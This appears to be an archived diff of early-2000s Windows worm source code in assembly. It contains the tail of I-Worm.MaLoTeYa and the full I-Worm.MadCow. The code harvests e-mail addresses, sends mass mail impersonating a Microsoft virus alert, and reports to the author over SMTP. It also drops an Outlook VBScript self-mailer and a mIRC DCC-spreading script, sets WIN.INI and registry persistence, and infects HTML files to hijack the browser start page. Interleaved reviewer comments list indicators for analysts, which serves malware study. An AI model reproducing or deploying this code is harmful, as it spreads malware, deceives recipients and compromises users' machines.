ServIP dd 0 ; IP of server
db 8 dup(0) ; Unused
@1:
push [work_socket]
callx connect
inc eax
jz CLOSE_SOC
lea esi,Send_M
mov bl,6
Command_Loop: xor eax,eax
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
push ecx ; Send command and data to the socket
push 00h
push ecx ; Size of buffer
push eax ; Buffer
push [work_socket]
callx send
pop ecx
cmp eax,ecx
jne CLOSE_SOC
dec ebx
jns Command_Loop
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
INIT: @pushsz "MAPI32.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov MAPIhdl,eax
@pushsz "MAPISendMail"
push MAPIhdl
callx GetProcAddress
test eax,eax
jz FIN
mov sendmail,eax
D_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 20h ; MSIE Cache Folder
push offset Cache
push 00h
call [getfolder]
push [SHELLhdl]
callx FreeLibrary
push offset Cache
callx SetCurrentDirectoryA
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
i_htm: call infect2
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
popad
ret
scan_mail:
xor edx,edx
add esi,7 ; size of the string "mailto:"
mov edi,offset m_addr
push edi
p_car: lodsb ; next character
cmp al,' ' ; space ??
je car_s
cmp al,'"' ; end character ??
je car_f
cmp al,'''' ; end character ??
je car_f
cmp al,'@' ; @ character ??
jne not_a
inc edx
not_a: stosb
jmp p_car ; jmp to nxt char
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ; exist @ ??
je d_scan_mail
call ENVOIE
jmp d_scan_mail
ENVOIE: xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIh]
call [sendmail]
ret
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
sujet db "New Virus Alert !!",00h
corps db "This is a fix against I-Worm.Magistr.",0dh,0ah
db "Run the attached file (MSVA.EXE) to detect, repair and "
db "protect you against this malicious worm.",00h
date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM
NameFrom db "Microsoft Virus Alert"
MailFrom db "virus_alert@microsoft.com",00h
NameTo db "Customer",00h
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah
fHELO:
dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA db 'DATA',0dh,0ah
fDATA:
dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
db 'Subject: Long Live the Worm',0dh,0ah
db 'Pays d''origine : '
org_pays db 20 dup (0)
db '',0dh,0ah
db '.',0dh,0ah
fMAIL:
dQUIT db 'QUIT',0dh,0ah
fQUIT:
htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah
db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
db "Sub control",0dh,0ah
db "dim i",0dh,0ah
db "dim caract",0dh,0ah
db "formu.action=""""",0dh,0ah
db "If formu.mail.value="""" Then",0dh,0ah
db " MsgBox ""Forgotten EMail""",0dh,0ah
db " Else",0dh,0ah
db " For i= 1 to len(formu.mail.value)",0dh,0ah
db " caract=mid(formu.mail.value,i,1)",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " Exit For",0dh,0ah
db " End If",0dh,0ah
db " Next",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
db " Else",0dh,0ah
db " MsgBox ""Invalid EMail""",0dh,0ah
db " End If",0dh,0ah
db "End If",0dh,0ah
db "End Sub",0dh,0ah
db "</SCRIPT>",0dh,0ah
db "<body bgcolor=white text=black>",0dh,0ah
db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah
db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
db "<font>You must be connected to internet.</font></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah
db "</form></body></html>",00h
HTMTAILLE equ $-htmd
d_htm: db "",0dh,0ah,0dh,0ah
db "<SCRIPT Language=VBScript>",0dh,0ah
db "On Error Resume Next",0dh,0ah
db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah
db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus"
db "<br>Written by PetiK (c)2001"
db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
HTMSIZE equ $-d_htm
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
OSVer OSVERSIONINFO <>
SystemTime SYSTIME <>
Search WIN32_FIND_DATA <>
end DEBUT
end
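Review bot: The header comment at the top of this file describes an e-mail spreading stage that the code as added does not reach: `infect2` pushes the seven CreateFileA arguments but no `callx CreateFileA` follows before the `inc eax` / `je END_SPREAD` handle test, and the `i_htm` loop branches back with `jne i_file` (the first loop's label) rather than to its own, so the "Temporary Internet Files" scan and the MAPI send described in the header should not be taken at face value by an analyst reading this archive. The header should be hedged accordingly, e.g. `; NOTE: the cache scan / MAPI send path in infect2 does not call CreateFileA as written — behaviour described above is intent, not what the binary does`. The artifacts the code does create — `\RUNW32.EXE` in the Windows directory, `\MSVA.EXE` in the system directory, the `run=` line written to WIN.INI, `VARegistered.htm` in the StartUp folder, the VBScript appended to `*.htm*` files in the Windows directory, and the SMTP report to the hard-coded host — are the dependable indicators and would be worth listing explicitly in the header for triage.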

353
Win32/I-Worm.MadCow.asm Normal file

@ -0,0 +1,353 @@
comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
Pour assembler : tasm32 /M /ML madcow.asm
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *
jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
szWin db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"
vbsd:
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid
include icone.inc
.code
DEBUT:
VERIF: mov eax,offset CLE ; Vrifie si il existe une cl
call REG ; [Atchoum] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne INIFILE ; on installe les composants
COPIE: push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; dans le dossier SYSTEM
push offset Copie ;
push offset szCopie ;
call lstrcat ; sous le nom de Wininet32.exe
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
push 260 ; puis
push offset szCopi2 ;
call GetWindowsDirectoryA ; … nouveau dans le dossier WINDOWS
push offset Copie2 ;
push offset szCopi2 ;
call lstrcat ; sous le nom de MadCow.exe
push 00h ;
push offset szCopi2 ;
push offset szOrig ;
call CopyFileA ;
WIN_INI:push 260 ; Pour lancer le programme, on peut
push offset szWin ;
call GetWindowsDirectoryA ; utiliser la base de registre ou le
push offset Winini ;
push offset szWin ; fichier WIN.INI dans le dossier
call lstrcat ;
push offset szWin ; WINDOWS. La dmarche est simple :
push offset szCopie ; [windows]
push offset run ; run="nom du programme"
push offset windows ;
call WritePrivateProfileStringA ;
DIR: push 00h ; On cre ici C:\Win32
push offset Dossier ;
call CreateDirectoryA ;
EMAIL :push 00000000h ; On va crer C:\Win32\ENVOIE.VBS
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset VBSFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT
push 00000080h ;
push 00000002h ; qui va xcuter ENVOIE.VBS
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset BATFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
jmp EXECBAT ;
REG: push offset regDisp ;
push offset regResu ;
push 0 ;
push 0F003Fh ;
push 0 ;
push 0 ;
push 0 ;
push eax ; Software\[Atchoum]
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
push [regResu] ; met la valeur dans regResu
call RegCloseKey ;
ret ;
INIFILE:push 00000000h ; On va crer dans C:\Win32
push 00000001h ;
push 00000002h ; le fichier script.ini
push 00000000h ;
push 00000001h ; en lecture seul.
push 40000000h ;
push offset fileini ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push initaille ;
push offset inid ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 00h ; On va copier ce fichier dans les
push offset script1 ; rpertoire suivant :
push offset fileini ;
call CopyFileA ; C:\mirc C:\mirc32
test eax,eax ; C:\program files\mirc et dans
jnz COPYWIN ; C:\program files\mirc32
push 00h ;
push offset script2 ; Si il arrive … se copier dans un
push offset fileini ; de ces fichier, il va crer une
call CopyFileA ; copie du programme dans C:\Win32
test eax,eax ; le nom MadCow.exe
jnz COPYWIN ;
push 00h ;
push offset script3 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jnz COPYWIN ;
push 00h ;
push offset script4 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jz ICOFILE ;
COPYWIN:push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;
ICOFILE:push 00000000h ; On va crer … la base du disque
push 00000080h ;
push 00000002h ; dur le fichier Salut.ico
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset fichier ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push icotaille ;
push offset icod ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 260 ; On dplace le fichier Salut.ico
push offset szCico ;
call GetSystemDirectoryA ; dans le dossier SYSTEM sous
push offset Copico ;
push offset szCico ; MSLS.ICO
call lstrcat ;
push offset szCico ;
push offset fichier ;
call MoveFileA ; => c'est fait
REG2: push offset l ;
push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ; Run
push 80000000h ; HKEY_CLASSES_ROOT
call RegCreateKeyExA ;
push 05h ;
push offset szCico ; %system%\MSLS.ico
push 01h ;
push 0 ;
push 00h ; VALEUR PAR DEFAUT
push p ;
call RegSetValueExA ; CREE UN REGISTRE
push 0 ;
call RegCloseKey ; FERME LA BASE DE REGISTRE
jmp FIN ; PUIS TERMINE LE PROGRAMME
EXECBAT:push 01h ; On xcute le fichier ENVOIE.BAT
push offset BATFILE ;
call WinExec ;
FIN: push 00h ; FIN DU PROGRAMME
call ExitProcess ;
end DEBUT
*************************************************************************
comment *
ICONE.INC pour I-Worm.MadCow
CE FICHIER EST LA FORME HEXADECIMAL DE L'ICONE QUE L'ON VEUT CREER
*
icod:
db 000h,000h,001h,000h,001h,000h,010h,010h,010h,000h,000h,000h,000h,000h
db 028h,001h,000h,000h,016h,000h,000h,000h,028h,000h,000h,000h,010h,000h
db 000h,000h,020h,000h,000h,000h,001h,000h,004h,000h,000h,000h,000h,000h
db 0C0h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,010h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,080h,000h
db 000h,080h,000h,000h,000h,080h,080h,000h,080h,000h,000h,000h,080h,000h
db 080h,000h,080h,080h,000h,000h,0C0h,0C0h,0C0h,000h,080h,080h,080h,000h
db 000h,000h,0FFh,000h,000h,0FFh,000h,000h,000h,0FFh,0FFh,000h,0FFh,000h
db 000h,000h,0FFh,000h,0FFh,000h,0FFh,0FFh,000h,000h,0FFh,0FFh,0FFh,000h
db 0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0F0h,000h,000h,000h,000h,000h
db 000h,00Fh,0F0h,000h,000h,000h,000h,000h,000h,00Fh,0F0h,000h,000h,00Fh
db 0FFh,000h,000h,00Fh,0F0h,000h,000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h
db 000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
db 0F0h,000h,00Fh,000h,00Fh,00Fh,000h,00Fh,0F0h,000h,0F0h,0FFh,000h,0F0h
db 0F0h,00Fh,0F0h,000h,0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h
db 000h,00Fh,000h,00Fh,0F0h,000h,00Fh,0FFh,0FFh,0FFh,000h,00Fh,0F0h,000h
db 0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
db 0F0h,000h,000h,000h,000h,000h,000h,00Fh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh
db 0FFh,0FFh,000h,000h,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh
db 07Eh,03Eh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Bh,0EEh
db 0FFh,0FFh,07Bh,0AEh,0FFh,0FFh,074h,0D6h,0FFh,0FFh,077h,0F6h,0FFh,0FFh
db 07Bh,0EEh,0FFh,0FFh,078h,00Eh,0FFh,0FFh,077h,0F6h,0FFh,0FFh,07Bh,0EEh
db 0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,000h,000h,0FFh,0FFh
icotaille equ $-icod
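Review bot: The comment on the `push offset CLE2` line in REG2 reads `; Run`, but CLE2 is `\exefile\DefaultIcon` under HKEY_CLASSES_ROOT, so the comment misdescribes the registry write; it should read `; \exefile\DefaultIcon — replaces the default .exe icon`. The `comment *` header of this file gives only the tasm/tlink command lines, and the remaining commentary is in French and scattered per instruction; for an archive read by analysts, a short English summary of the on-disk and registry artifacts — `C:\Win32` holding ENVOIE.VBS, ENVOIE.BAT, script.ini and MadCow.exe, `Wininet32.exe` in the system directory, `MadCow.exe` in the Windows directory, the `run=` line in WIN.INI, `MSLS.ICO` in the system directory, the DefaultIcon value and the `Software\[Atchoum]` marker key under HKLM — would be more useful at the top than in the margins. Note also that the `RegSetValueExA` call passes `05h` as cbData for the szCico path, so the DefaultIcon value an analyst finds on an affected system will be a truncated string rather than the full `%system%\MSLS.ICO` the adjacent comment implies.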

4982
Win32/I-worm.Icecubes.asm Normal file
